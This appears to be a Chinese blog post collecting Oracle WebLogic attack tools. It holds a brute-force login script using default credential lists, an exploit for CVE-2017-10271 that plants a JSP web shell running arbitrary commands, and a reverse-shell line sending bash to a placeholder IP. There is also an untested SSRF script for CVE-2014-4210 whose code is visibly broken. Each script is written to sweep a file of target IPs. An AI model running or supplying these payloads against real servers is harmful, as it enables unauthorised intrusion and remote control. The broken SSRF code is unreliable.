漏洞列表弱口令

ssrf CVE-2014-4210

WLS 组件远程代码执行 CVE-2017-10271

任意上传 CVE-2018-2894

weak passwd&&CVE-2018-2894

weblogic 10.3.6(11g)

登录地址:

http://ip:7001/console/login/LoginForm.jsp

默认口令:

weblogic

Oracle@123

CVE-2018-2894要登录上传详情

POCimport requests

def weak_passwd():

users = ['weblogic','admin','system','mary','wlcsystem','wlpisystem']

passwds = ['password','Oracle@123','weblogic','security','wlcsystem','wlpisystem']

with open(r'ip.txt','r') as f:

for ip in f.readlines():

ip = ip.strip()

try:

target = 'http://' + ip + '/console/j_security_check'

headers = {

'Host': ip,

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',

}

for user in users:

for passwd in passwds:

data = {'j_username':user,'j_password':passwd}

r = requests.post(url=target,data=data,headers=headers,timeout=5)

if r.text.count('注销') != 0:

print('[+]' + ip + ' 登录成功' + 'user:{} passwd:{}'.format(user,passwd))

except Exception as e:

print('[+]' + ip + ' 失败')

if __name__ == '__main__':

weak_passwd()

CVE-2017-10271

Oracle WebLogic Server10.3.6.0.0 版本

Oracle WebLogic Server12.1.3.0.0 版本

Oracle WebLogic Server12.2.1.1.0 版本

Oracle WebLogic Server12.2.1.2.0 版本

反弹shell

传cmdshell

EXPimport requests

def wls_unser():

with open(r'ip.txt','r') as f:

for ip in f.readlines():

ip = ip.strip()

try:

url = 'http://' + ip + '/wls-wsat/CoordinatorPortType'

target = 'http://' + ip + '/bea_wls_internal/index.jsp'

headers = {

'Content-Type': 'text/xml',

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',

}

data = '''

servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/index.jsp

java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("command")).getInputStream();

int a = -1;

byte[] b = new byte[2048];

out.print("

");

while((a=in.read(b))!=-1){

out.println(new String(b));

}

out.print("

");

} %>]]>

'''

'''

反弹shell请替换data以及接收端ip

/bin/bash

-c

bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/21 0>&1

'''

r = requests.post(url=url,data=data,headers=headers,timeout=4)

res = requests.get(url=target,headers=headers,timeout=4)

if res.status_code == 200 :

print('[+] shell:' + target)

except Exception as e:

print('[+]'+ ip + ' 失败')

if __name__ == '__main__':

wls_unser()

SSRF

docker搭建环境失败了,不知道什么原因。

ssrf利用

EXP

环境没搭建成,没测试

import requests

def ssrf(ip):

try:

#payload =input('payload:')

target = 'http://' + ip + '/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator={}'.format(payload)

if payload == '':

target = 'http://' + ip + '/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001'

headers = {

'Content-Type': 'text/xml',

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',

'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',

}

res = requests.get(url=target,headers=headers,timeout=4)

if res.status_code == 200 and 'Oracle WebLogic Server' in res.text:

print('[+]' + ip + ' 存在ssrf')

else:

print(res.text)

except Exception as e:

print('[+]' + ip + ' 失败')

if __name__ == '__main__':

with open(r'ip.txt','r') as f:

for ip in f.readlines():

ip = ip.strip()

wls_unser(ip)

weak_passwd(ip)

ssrf(ip)

简单合一块也没加多线程效率低下。

poc weblogic 漏洞利用_weblogic漏洞利用汇总相关推荐

  1. poc weblogic 漏洞利用_Weblogic 漏洞利用总结

    整理的一些利用方式,后续会更新到15年至今的洞 后台爆破拿shell 后台爆破: 部署-安装-上载文件 制作war包,一直下一步,最好保存 jar -cvf shell.war ./shll/* 上传 ...

  2. CORS漏洞利用检测和利用方式

    CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...

  3. 一则利用内核漏洞获取root权限的案例【转】

    转自:https://blog.csdn.net/u014089131/article/details/73933649 目录(?)[-] 漏洞描述 漏洞的影响范围 漏洞曝光时间 漏洞产生的原因 漏洞 ...

  4. 【安全漏洞】朝鲜InkySquid APT组织是怎么利用浏览器漏洞感染受害者

    朝鲜InkySquid APT组织利用浏览器漏洞感染受害者. 2021年4月,Volexity研究人员识别出了通过www.dailynk[.]com网站加载到恶意子域名的jquery[.]servic ...

  5. 别再问Cloudflare CDN 漏洞是怎么被利用的啦!这篇文就来告诉你

    Cloudflare 已修复其免费开源 CDNJS 中的一个严重漏洞,该漏洞可能影响互联网上 12.7% 的网站. CDNJS为数百万网站提供超过4000个JavaScript和CSS库,这些库公开存 ...

  6. Android libcutils库中整数溢出导致的堆破坏漏洞的发现与利用

    作者:龚广(@oldfresher) 阅读本文之前,您最好理解Android中的Binder机制.用于图形系统的BufferQueue原理.堆管理器je_malloc的基本原理. 此文介绍了如何利用l ...

  7. weblogic中ssrf漏洞修复_WebLogic SSRF 及漏洞修复

    SSRF漏洞,也称为XSPA(跨站端口攻击),问题存在于应用程序在加载用户提供的URL时,没能正确验证服务器的响应,然后就反馈回了客户端.攻击者可以利用该漏洞绕过访问限制(如防火墙),进而将受感染的服 ...

  8. 漏洞挖掘、漏洞分析和漏洞利用

    漏洞挖掘.漏洞分析和漏洞利用     利用漏洞进行***可以大致分为漏洞挖掘.漏洞分析.漏洞利用三个步骤.这三部分所用的技术有相同之处,比如都需要精通系统底层知识.逆向工程等:同时也有一定的差异. 1 ...

  9. 自检代码中trustmanager漏洞_Windows内核漏洞利用教程

    堆栈溢出漏洞 首先,我们将从HackSysExtremeVulnerableDriver中的vanilla栈溢出漏洞开始讲起. 当向堆栈上的缓冲区存放的数据超出其存储容量时(例如,向16字节缓冲区(这 ...

最新文章

  1. python namedtuple用法_Python namedtuple(命名元组)使用实例
  2. 新版数采仪问题解决全记录-升级失败问题
  3. matlab中方波信号的谐波表示
  4. java按钮改变窗口大小_布局似乎有问题,JButton在调整窗口大小时显示出意外的行为。...
  5. php substr_replace 中文乱码,php substr_replace替换字符串一些实例_PHP教程
  6. 深度学习实践指南(二)—— 符号编程
  7. ip_conntrack: falling back to vmalloc解决办法
  8. 智汇华云 | 集群自动化部署服务流程之自动化集群配置(上)
  9. 小程序毕设作品之微信酒店预订小程序毕业设计(8)毕业设计论文模板
  10. nodejs读取服务器json文件,如何使用Node.js读取JSON文件
  11. ReportMachine报表控件唯一官方论坛 - http://rmachine.5d6d.com/
  12. java线程栈日志_Java线程堆栈
  13. 童年十大经典玩耍游戏
  14. String的spilt()方法
  15. UE4中程序驱动的LookAt动画
  16. 空气质量指数(AQI)分析与预测
  17. 浅谈SEO的优化问题
  18. android应用 数量,谷歌Android应用数量超40万 免费应用占总数2/3
  19. java以下声明变量中 是不合法的_java考试复习题
  20. 这一次,彻底搞懂useEffect

热门文章

  1. 初级项目经理和高级项目经理的区别
  2. 只需5分钟看完这篇 HTTPS,去阿里面试和面试官扯皮就没问题了!
  3. 【网络篇】几种网络模式
  4. 计算机教案.doc免费,计算机模板教案.doc
  5. 基于python实现百度网盘文件下载
  6. springboot基于微信小程序的运动软件前端的设计与实现 毕业设计-附源码100932
  7. curl post参数问题
  8. java 之sun_“Java之父”讲解不为人知的Sun软件趣闻
  9. 基金行业应用软件机器人实现估值核算自动化
  10. 十四届蓝桥杯青少组选拔赛Python_2023.02.12